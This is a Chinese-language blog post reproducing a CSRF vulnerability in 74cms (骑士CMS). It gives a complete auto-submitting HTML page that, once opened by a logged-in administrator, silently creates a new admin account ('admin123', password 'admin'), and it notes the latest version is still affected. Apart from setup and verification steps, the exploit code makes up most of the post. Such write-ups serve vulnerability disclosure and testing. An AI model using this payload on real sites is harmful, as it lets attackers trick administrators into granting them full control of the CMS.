骑士CMS的CSRF利用

描述

由于存在CSRF漏洞,攻击者可以通过诱导管理员点击恶意页面从而添加管理员账户的效果(测试最新版依旧存在该漏洞)。

环境准备

官网下载最新版本进行安装(PHPstudy集成环境直接部署)1632384493_614c35ed8504622beeb2f.png!small?1632384494029

复现

①本地搭建好环境测试之后,登录后台,此时后台只有一个管理员1632384603_614c365b1f9ba539b0916.png!small?1632384603028

②通过诱导登陆了管理员的终端点击该payload:http://10.0.0.3:90/payload.html页面,即可完成添加新的管理员1632384638_614c367e37bd29fbab1d6.png!small?1632384638056

③payload 代码如下:(通过提交至该url:/index.php?m=admin&c=admin&a=add 添加一个用户名为admin123,密码为admin的管理员)

<!DOCTYPE html>

<html>

<head>

<title> CSRF </title>

<script type=”text/javascript”>

function exec1(){

document.getElementById(‘form1’).submit();

}

</script>

</head>

<body onload=”exec1();”>

<form id=”form1″ action=”http://10.0.0.3:90/74cms2/index.php?m=admin&c=admin&a=add” method=”POST”>

<input type=”hidden” name=”username” value=”admin123″ />

<input type=”hidden” name=”email” value=”111111111@qq.com” />

<input type=”hidden” name=”password” value=”admin” />

<input type=”hidden” name=”repassword” value=”admin” />

<input type=”hidden” name=”role_id” value=”1″ />

</form>

</body>

</html>

验证

看到后台管理处已经添加了   admin123  账号1632384936_614c37a82d711ff4a0637.png!small?1632384936470

进行登录验证1632385022_614c37feebe28b427ead8.png!small?1632385022944

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发